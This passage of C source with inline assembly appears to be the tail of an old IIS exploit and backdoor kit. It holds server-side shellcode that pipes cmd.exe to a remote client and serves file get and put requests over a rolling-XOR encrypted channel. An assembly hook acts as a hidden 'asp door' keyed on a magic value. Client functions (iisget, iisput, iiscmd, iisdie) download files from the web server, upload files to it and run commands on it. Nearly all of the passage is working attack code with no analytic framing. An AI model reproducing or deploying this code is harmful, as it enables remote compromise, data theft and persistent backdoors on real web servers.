                            l-=lBytesRead;
                       //     if(fpt>0)

WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
//                             else Sleepadd(010);
                          }

//                           if(i>100) l=0;
                      }
                      else {
                          Sleepadd(0100);
                          ++i;
                      }
                      if(i>10000) l=0;
                   }

                   CloseHandleadd(fpt);
                   l=0;
                }
                else{

if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]
==' '){

               //
fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTIN
G,FILE_ATTRIBUTE_NORMAL,0);


fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,
NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
                        Sleepadd(100);
                        l=GetFileSizeadd(fpt,&k);
                        *(int *)Buff='ezis';        //size
                        *(int *)(Buff+4)=l;
                        lBytesRead=8;
                         for(i=0;i<lBytesRead;++i){
                             lockintvar2=lockintvar2*0x100;
                             lockintvar2=lockintvar2%LOCKBIGNUM;
                             lockcharvar=lockintvar2%0x100;
                             Buff[i]^=lockcharvar;   // DATAXORCODE;
                         }

                        writeclient(ConnID,Buff,&lBytesRead,0); //
HSE_IO_SYNC);
                  //      Sleepadd(100);
                        i=0;
                        while(l>0){
                             k=SHELLBUFFSIZE;
                             ReadFileadd(fpt,Buff,k,&k,0);
                             if(k>0){
                                for(i=0;i<k;++i){
                                     lockintvar2=lockintvar2*0x100;
                                     lockintvar2=lockintvar2%LOCKBIGNUM
;
                                     lockcharvar=lockintvar2%0x100;
                                     Buff[i]^=lockcharvar;   //
DATAXORCODE;
                                }

                                i=0;
                                l-=k;
                                writeclient(ConnID,Buff,&k,0); //
HSE_IO_SYNC);
//                                   Sleepadd(100);
             //
k=readclient(ConnID,Buff,&lBytesRead);

                                }
                             else ++i;
                             if(i>100) l=0;
                        }
                        CloseHandleadd(fpt);
                        l=0;
                    }
                    else l=1;
                }
             }
             if(k!=1){
               k=8;
               WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
               WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
               WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
               k=GetLastErroradd();
               while(k==0x2746){
                 if(thedoor==1)      goto asmreturn;
                 Sleepadd(0x7fffffff);                  //����
               }

             }
             else{

WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
 //              Sleepadd(1000);
             }
       }
   }

   die: goto die  ;
     _asm{
asmreturn:
                  mov eax,HSE_STATUS_SUCCESS
                  leave
                  ret 04
door:              push eax
                  mov eax,[esp+0x08]
                  mov eax,[eax+0x64]
                  mov eax,[eax]
                  cmp eax,'ok!!'
                  jnz jmpold
                  pop eax
                  push 0x12345678  //dooradd-0x13
                  ret
jmpold:               pop  eax
                  push 0x12345678   //dooradd-0xc
                  ret               //1
                  jmp  door         //2
getdoorcall:       call getdooradd   //5

getexceptretadd:   pop  eax
                  push eax
                  mov  edi,dword ptr [stradd]
                  mov dword ptr [edi-0x0e],eax
                  ret
errprogram:           mov eax,dword ptr [esp+0x0c]
                  add eax,0xb8
                  mov dword ptr [eax],0x11223344  //stradd-0xe
                  xor eax,eax                //2
                  ret                        //1
execptprogram:     jmp errprogram            //2 bytes     stradd-7
nextcall:          call getstradd            //5 bytes
                  NOP
                  NOP
                  NOP
                  NOP
                  NOP
                  NOP
                  NOP
                  NOP
                  NOP
       }
}
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
  int i,k;
  unsigned char temp;
  char *calladd;
  for(i=0;i<len;++i){
      temp=shellbuff[i];
      if(temp==0xe8){
        k=*(int *)(shellbuff+i+1);
        calladd=fnadd;
        calladd+=k;
        calladd+=i;
        calladd+=5;
        if(calladd==chkesp){
            shellbuff[i]=0x90;
            shellbuff[i+1]=0x43;   // inc ebx
            shellbuff[i+2]=0x4b;    // dec ebx
            shellbuff[i+3]=0x43;
            shellbuff[i+4]=0x4b;
        }
      }
  }
}
void iisput(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
for(i=0;i<j;++i,++str){
    if(*str!=' '){
        filename=str;
        break;
    }
}
for(;i<j;++i,++str){
    if(*str==' ') {
        *str=0;
        break;
    }
}
++i;
++str;
for(;i<j;++i,++str){
    if(*str!=' '){
      filename2=str;
      break;
    }
}
for(;i<j;++i,++str){
    if(*str==' ') {
        *str=0;
        break;
    }
}
if(filename=="\x0") {
    printf("\n iisput filename [path\\fiename]\n");
    return;
}
if(filename2=="\x0") filename2=filename;
printf("\n begin put file:%s",filename);
j=0;
ioctlsocket(fd, FIONBIO, &j);
Sleep(1000);
fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,0);
filesize=GetFileSize(fpt,&filesizehigh);
strcpy(buff,"put ");
*(int *)(buff+4)=filesize;
filesize=*(int *)(buff+4);
strcpy(buff+0x8,filename2);
newsend(fd,buff,i+0x9,0);
printf("\n put file:%s to file:%s %d
bytes",filename,filename2,filesize);
Sleep(1000);
while(filesize>0){
     size=0x800;
     ReadFile(fpt,buff,size,&size,NULL);
     if(size>0){
         filesize-=size;
         newsend(fd,buff,size,0);
//          Sleep(0100);

     }
}
// size=filesize;
// ReadFile(fpt,buff,size,&size,NULL);
// if(size>0) send(fd,buff,size,0);
CloseHandle(fpt);
j=1;
ioctlsocket(fd, FIONBIO, &j);
printf("\n put file ok!\n");
Sleep(1000);
}
void iisget(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
for(i=0;i<j;++i,++str){
    if(*str!=' '){
        filename=str;
        break;
    }
}
for(;i<j;++i,++str){
    if(*str==' ') {
        *str=0;
        break;
    }
}
++i;
++str;
for(;i<j;++i,++str){
    if(*str!=' '){
      filename2=str;
      break;
    }
}
for(;i<j;++i,++str){
    if(*str==' ') {
        *str=0;
        break;
    }
}
if(filename=="\x0") {
    printf("\n iisget filename [path\\fiename]\n");
    return;
}
if(filename2=="\x0") filename2=filename;
printf("\n begin get file:%s",filename);
fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHAR
E_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
strcpy(buff,"get ");
strcpy(buff+0x4,filename2);
newsend(fd,buff,i+0x5,0);
printf("\n get file:%s from file:%s",filename,filename2);
 j=0;
 ioctlsocket(fd, FIONBIO, &j);
i=0;
filesize=0;
j=0;
while(j<100){
//    Sleep(100);
   i=newrecv(fd,buff,0x800,0);
   if(i>0){
       buff[i]=0;
       if(memcmp(buff,"size",4)==0){
           filesize=*(int *)(buff+4);
           j=100;
       }
       else {

/*              for(j=0;j<i;++j){
               lockintvar1=lockintvar1*0x100;
               lockintvar1=lockintvar1%LOCKBIGNUM;
               lockcharvar=lockintvar1%0x100;
               buff[j]^=lockcharvar;   // DATAXORCODE;
             }
*/
             j=0;
             printf("\n recv %s",buff);
       }
   }
   else ++j;
//    if(j>1000) i=0;
}
printf("\n file %d bytes %d\n",filesize,i);
if(i>8){
     i-=8;
     filesize-=i;
     WriteFile(fpt,buff+8,i,&i,NULL);

}
while(filesize>0){
         size=newrecv(fd,buff,0x800,0);
         if(size>0){
            filesize-=size;
            WriteFile(fpt,buff,size,&size,NULL);

         }
         else {
             if(size==0) {
              printf("\n ftp close \n ");
             }
             else {
                 printf("\n Sleep(100)");
                 Sleep(100);
             }
         }
}
CloseHandle(fpt);
printf("\n get file ok!\n");
j=1;
ioctlsocket(fd, FIONBIO, &j);
}
void iisreset(int fd,char *str){
   char buff[0x2000];
   int  i,j;
   printf("\nreset xor data.\n");
   Sleep(1000);
   j=0;
   ioctlsocket(fd, FIONBIO, &j);
   strcpy(buff,"reset");
   newsend(fd,buff,strlen(buff),0);
   Sleep(1000);

   lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
   lockintvar2=lockintvar1;
   while(1){
     j=recv(fd,buff,0x2000,0);
     if(j>0){
         buff[j]=0;
         for(i=0;i<j;++i){
             if(buff[i]==0) buff[i]='b';
         }
   //      printf("\nrecv 0x%x bytes:%s",j,buff);
         if(strstr(buff,"xordatareset")!=0){
             printf("\nxor data reset ok.\n");
            for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){
               lockintvar1=lockintvar1*0x100;
               lockintvar1=lockintvar1%LOCKBIGNUM;
               lockcharvar=lockintvar1%0x100;
               buff[i]^=lockcharvar;   // DATAXORCODE;
             }

             break;
         }
     }
//      else if(j==0) break;
//      strcpy(buff,"\r\nmkdir d:\\test6\r\n");
//      newsend(fd,buff,strlen(buff),0);
   }
   Sleep(1000);
   j=1;
   ioctlsocket(fd, FIONBIO, &j);
//    printf("aaa");
}
void iisdie(int fd,char *str){
   char buff[0x200];
   int  j;
   printf("\niis die.\n");
   j=0;
   ioctlsocket(fd, FIONBIO, &j);
   Sleep(1000);
   strcpy(buff,"iisrr ");
   newsend(fd,buff,strlen(buff),0);
   Sleep(1000);
   j=1;
   ioctlsocket(fd, FIONBIO, &j);
   lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
   lockintvar2=lockintvar1;
}
void iiscmd(int fd,char *str){
   char *cmd="\0";
   char buff[2000];
   int  i,j;
   j=strlen(str);
   for(i=0;i<j;++i,++str){
     if(*str!=' '){
         cmd=str;
        break;
     }
   }
   j=strlen(str);
   for(i=0;i<j;++i){
      if(*(str+j-i-1)!=' ') {
          break;
      }
      else *(str+j-i-1)=0;
   }

   if(cmd=="\x0") {
       printf("\niiscmd cmd\n");
       return;
   }
   printf("\nbegin run cmd:%s",cmd);
   j=0;
   ioctlsocket(fd, FIONBIO, &j);
   Sleep(1000);
   strcpy(buff,"iisc ");
   strcat(buff,cmd);
   newsend(fd,buff,strlen(buff),0);
   Sleep(1000);
   j=1;
   ioctlsocket(fd, FIONBIO, &j);
/*
   lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
   lockintvar2=lockintvar1;
*/
}
int newrecv(int fd,char *buff,int size,int flag){

   int i,k;
   k=recv(fd,buff,size,flag);
   if(xordatabegin==1){
             for(i=0;i<k;++i){
               lockintvar1=lockintvar1*0x100;
               lockintvar1=lockintvar1%LOCKBIGNUM;
               lockcharvar=lockintvar1%0x100;
               buff[i]^=lockcharvar;   // DATAXORCODE;
             }

   }
   else{
       if(k>0){
           buff[k]=0;
           if(strstr(buff,"XORDATA")!=0) {
             xordatabegin=1;
             for(i=strstr(buff,"XORDATA")-buff+8;i<k;++i){
               lockintvar1=lockintvar1*0x100;
               lockintvar1=lockintvar1%LOCKBIGNUM;
               lockcharvar=lockintvar1%0x100;
               buff[i]^=lockcharvar;   // DATAXORCODE;
             }
           }
        }

   }
   return(k);
}
int newsend(int fd,char *buff,int size,int flag){
         int i;

         for(i=0;i<size;++i){
               lockintvar2=lockintvar2*0x100;
               lockintvar2=lockintvar2%LOCKBIGNUM;
               lockcharvar=lockintvar2%0x100;
               buff[i]^=lockcharvar;   // DATAXORCODE;
 //              buff[i]^=DATAXORCODE;
         }
     return(send(fd,buff,size,flag));
}
void iishelp(){
 printf("\nusage:");
 printf("\niisget filename filename.  get file from web server.");
 printf("\niisput filename filename.  put file to web server.");
 printf("\niiscmd cmd.  run cmd on web server.");
 printf("\niisreset.  reset the xor data.");
 printf("\niisdie.  reset the asp door.");
 printf("\n\n");
}